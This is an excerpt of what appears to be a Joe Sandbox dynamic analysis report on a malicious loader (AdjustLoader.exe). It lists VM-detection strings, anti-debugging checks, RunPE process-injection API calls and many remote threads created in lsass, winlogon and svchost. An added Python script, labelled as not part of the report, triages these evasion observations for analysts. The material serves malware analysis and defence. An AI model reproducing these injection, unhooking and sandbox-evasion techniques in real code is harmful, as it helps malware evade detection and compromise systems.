%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%s%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%e%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%t%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTc
Source: Amcache.hve.11.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000039.00000000.2382060504.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003A.00000000.2385272501.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003D.00000000.2391047732.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003E.00000000.2392692164.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000027.00000002.2403335664.00000258002DE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: %dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%s%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%e%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%t%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP% GGfLdnNjrWNHmHzXyuIOdILAZUitiUBZAntHGCYCesLkhM
Source: Amcache.hve.11.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr Binary or memory string: \driver\vmci,\driver\pci
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: svchost.exe, 0000003A.00000000.2385547395.000002A660662000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Amcache.hve.11.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: svchost.exe, 0000003E.00000000.2392601155.000002295CE00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: AdjustLoader.exe, 00000000.00000002.1676383830.000001C8EF0EB000.00000004.00000800.00020000.00000000.sdmp, AdjustLoader.exe, 00000000.00000002.1676383830.000001C8EE6EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2018154793.0000027B002D2000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2018154793.0000027B0052E000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.00000258004F3000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.000002580047E000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.00000258002DE000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.00000258004FB000.00000004.00000001.00020000.00000000.sdmp, tmp6432.tmp.bat.0.dr, $nya-Loli.bat.8.dr Binary or memory string: %dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%s%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%e%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%t%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP% GGfLdnNjrWNHmHzXyuIOdILAZUitiUBZAntHGCYCesLkhMcIMpChCcgYUEMjfuaxuNgZnSqVwgKLWBsnRzGTsuwyguMcQOxKroPtFdvTZHLwsvbslyrGNhfarISSfoeHJZuIMZIOeMUKIZfLtuQsxRWjjOcW=COLCeNsbsGmQCBanusrChzLxMk
Source: dwm.exe, 0000003B.00000000.2390348324.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
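The observations in this section mix three kinds of evidence that carry different weight in triage. API-level behaviour of the sample chain is the strongest: the WMIC.exe and powershell.exe queries against Win32_DiskDrive, Win32_BaseBoard, Win32_BIOS and Win32_Processor, whose Model, Manufacturer and vendor fields name the hypervisor; the SetErrorMode flags NOGPFAULTERRORBOX | NOOPENFILEERRORBOX recorded earlier, which keep crash dialogs from stalling execution; and the Thread information set: HideFromDebugger calls (NtSetInformationThread with ThreadHideFromDebugger) listed under Anti Debugging below. Timing indicators come next: sleep counts above 30, cumulative sleep times at or above 30000 ms, and the recurring 922337203685477, which is Int64.MaxValue in 100-ns ticks expressed in milliseconds and is best read as an unbounded wait rather than a timer the loader expects to expire. Weakest are the hypervisor strings recovered from Amcache.hve and from dumps of lsass.exe, svchost.exe, winlogon.exe and dwm.exe: they describe the analysis VM itself and are not evidence that the sample checks for one. The script below is an added example and is not part of the Joe Sandbox report. It parses lines in the report's "Source: <who> <observation>: <detail>" format and buckets them accordingly. The sample lines are excerpted from this report; the WMI class list, hypervisor marker list, environment-source list and the one-year cutoff are the author's assumptions, while the 30 / 30000 thresholds mirror the report's own checks.

```python
"""Bucket Joe Sandbox evasion observations by the evidence they rest on."""
import re

# Int64.MaxValue in 100-ns ticks converted to milliseconds: the value the report
# prints for waits with no realistic timeout, i.e. an unbounded wait, not a timer.
MAX_WAIT_MS = (2**63 - 1) // 10_000          # 922337203685477
ONE_YEAR_MS = 365 * 86_400_000               # assumed cutoff: longer is not a timer
SLEEP_COUNT_THRESHOLD = 30                   # the report's own "count: N > 30"
SLEEP_TOTAL_MS_THRESHOLD = 30_000            # the report's own ">= -30000s"

# Assumed: WMI classes whose vendor/model fields name the hypervisor, strings that
# name one, and sources that describe the analysis VM rather than the sample.
VM_FINGERPRINT_CLASSES = {"win32_diskdrive", "win32_baseboard", "win32_bios",
                          "win32_processor", "win32_computersystem"}
HYPERVISOR_MARKERS = ("vmware", "vmci", "necvmwar", "hyper-v", "vbox", "qemu")
ENVIRONMENT_SOURCES = ("amcache.hve", "lsass.exe", "svchost.exe", "winlogon.exe", "dwm.exe")

OBSERVATIONS = ("WMI Queries", "Thread delayed", "Thread sleep count", "Thread sleep time",
                "Thread information set", "Process information set", "Binary or memory string")
LINE_RE = re.compile(r"^Source:\s+(?P<source>.+?)\s+(?P<obs>"
                     + "|".join(map(re.escape, OBSERVATIONS)) + r"):\s*(?P<detail>.*)$")
TID_RE = re.compile(r"\bTID:\s*(\d+)")
FROM_RE = re.compile(r"\bFROM\s+(\w+)", re.IGNORECASE)
NUM_RE = re.compile(r"-?\d+")

# Constructed input: lines excerpted verbatim from this report, not the full trace.
REPORT_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX",
    r"Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Users\user\Desktop\AdjustLoader.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\AdjustLoader.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep count: 6801 > 30",
    r"Source: C:\Windows\System32\cmd.exe TID: 1988 Thread sleep time: -55000s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger",
    r"Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual disk SCSI Disk Device",
    r"Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare",
    r"Source: wscript.exe, 00000014.00000002.2007218592.000001E4E9F92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\h",
]

def process_name(source):
    """Image name from a path, a 'path TID: n' prefix or a 'name, <dump>' list."""
    return TID_RE.sub("", source.split(",")[0]).strip().rsplit("\\", 1)[-1].lower()

def triage(lines):
    """Group evasion observations into behavioural, timing and environment buckets."""
    r = {"vm_fingerprint_queries": [], "unbounded_waits": 0, "sleep_loops": {}, "long_sleeps": {},
         "hidden_threads": 0, "error_modes": set(), "hypervisor_strings_sample_chain": [],
         "hypervisor_strings_environment": []}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                      # not a 'Source: ... <observation>: ...' line
        source, obs, detail = m.group("source", "obs", "detail")
        proc = process_name(source)
        tid = TID_RE.search(source)
        key = f"{proc}:{tid.group(1) if tid else '?'}"
        if obs == "WMI Queries":
            cls = FROM_RE.search(detail)
            if cls and cls.group(1).lower() in VM_FINGERPRINT_CLASSES:
                r["vm_fingerprint_queries"].append((proc, cls.group(1)))
        elif obs in ("Thread delayed", "Thread sleep time"):
            ms = abs(int(NUM_RE.search(detail).group()))   # sign and unit in the report are artefacts
            if ms == MAX_WAIT_MS or ms >= ONE_YEAR_MS:
                r["unbounded_waits"] += 1
            elif ms >= SLEEP_TOTAL_MS_THRESHOLD:
                r["long_sleeps"][key] = ms
        elif obs == "Thread sleep count":
            count = int(NUM_RE.search(detail).group())
            if count > SLEEP_COUNT_THRESHOLD:
                r["sleep_loops"][key] = count
        elif obs == "Thread information set" and detail == "HideFromDebugger":
            r["hidden_threads"] += 1                       # NtSetInformationThread(ThreadHideFromDebugger)
        elif obs == "Process information set":
            r["error_modes"].update(f.strip() for f in detail.split("|"))   # SetErrorMode flags
        elif obs == "Binary or memory string" and any(k in detail.lower() for k in HYPERVISOR_MARKERS):
            env = any(k in source.lower() for k in ENVIRONMENT_SOURCES)
            r["hypervisor_strings_environment" if env else "hypervisor_strings_sample_chain"].append((proc, detail))
    return r

def findings(r):
    """Render the triage buckets as analyst-facing lines."""
    out = []
    if r["vm_fingerprint_queries"]:
        out.append("VM fingerprinting via WMI: " + ", ".join(sorted({c for _, c in r["vm_fingerprint_queries"]})))
    if r["unbounded_waits"]:
        out.append(f"{r['unbounded_waits']} wait(s) with no real timeout (Int64.MaxValue ms)")
    out += [f"sleep loop in {k}: {n} sleeps" for k, n in r["sleep_loops"].items()]
    out += [f"cumulative sleep in {k}: {ms} ms" for k, ms in r["long_sleeps"].items()]
    if r["hidden_threads"]:
        out.append(f"{r['hidden_threads']} thread(s) hidden via ThreadHideFromDebugger")
    if r["error_modes"]:
        out.append("error dialogs suppressed via SetErrorMode: " + ", ".join(sorted(r["error_modes"])))
    out.append(f"hypervisor strings: {len(r['hypervisor_strings_sample_chain'])} in the sample chain, "
               f"{len(r['hypervisor_strings_environment'])} from the sandbox environment (not a VM check)")
    return out

if __name__ == "__main__":
    print("\n".join(findings(triage(REPORT_LINES))))
```

Run as-is it prints the findings for the excerpted lines; pointing triage() at the full report text (split into lines) shows how much of the VMware noise in this section comes from Amcache.hve and OS process dumps rather than from anything the sample did. The wscript.exe device path lands in the sample-chain bucket only because of where it was found; a device string in a child process's memory is still far weaker evidence than the WMIC.exe and powershell.exe queries, which are actions the sample chain took.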

Anti Debugging

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF78450 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_0000024D9FF78450
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF714A0 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 47_2_0000024D9FF714A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF78450 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_0000024D9FF78450
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF787B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 47_2_0000024D9FF787B4
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7CD20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_0000024D9FF7CD20
Source: C:\Users\user\Desktop\AdjustLoader.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 8180000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC642E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AE2E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 61302E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AF232E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 67D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B392E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBFD2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59042E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A9E72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 73162E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E862E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 473C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F9D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83BC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3F72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BDF32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0262E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9F32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 645B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AB42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ADB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1992E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BA92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13EF2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 777C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 641A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60D82E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A1602E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7F232E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7AF92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 80852E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A3142E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E53C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3DFA2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1BCE2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 762570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1052570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 532570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1032570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1082570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 762570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1222570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 702570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 502570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B32570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E12570
